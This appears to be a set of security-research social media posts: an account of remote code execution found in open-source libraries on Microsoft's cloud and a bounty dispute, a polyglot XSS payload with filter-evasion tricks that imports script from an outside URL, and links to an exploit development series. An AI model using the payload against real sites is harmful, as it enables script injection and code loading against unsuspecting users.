What happens when your math and map processing libs become RCE vectors?
We've exploited OSS libraries to pop 2 shells on Microsoft's cloud infra, got assessed "low" severity, and found 2 bypasses again to defend our case, almost losing out on 6 digits in bounties
The current impact is over 120,000 repos just on GitHub. AI agents, LangChain, TiTiler, pandas.
Everybody wants the researchers to be responsible.
Here's how responsible disclosure looks like from the other side:
A payload with a nice set of evasion tricks, by @KN0X55
JavaScript://%250A/*?'/*\'/*"/*\ "/*`/*\`/*%26apos;)/*<!--></Title/<Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(inport(/https:https://t.co/Nbr642SRnR))}//\76-->
The Exploiting Reversing Series (ERS) currently features 1051 pages of exploit development based on real-world targets:
[+] ERS 09: https://t.co/V0K5p1XvH9
[+] ERS 08: https://t.co/MPwYP7j8Qt
[+] ERS 07: https://t.co/h18hZC0azl
[+] ERS 06: https://t.co/Sh8pgB4bh8
[+] ERS 05: https://t.co/rdaPMOm4WM
[+] ERS 04: https://t.co/Vf0Fnwf0tc
[+] ERS 03: https://t.co/4lo5Hi0gnd
[+] ERS 02: https://t.co/6SNMK1tBkd
[+] ERS 01: https://t.co/YMTSBl59VC
Now is the time to take a break to dedicate all my energy and focus to security research and new projects that will be announced in the coming weeks and months.
Have a great day and enjoy reading.
#exploit #exploitation #windows #chrome #macOS #iOS #hypervisors #vulnerability #research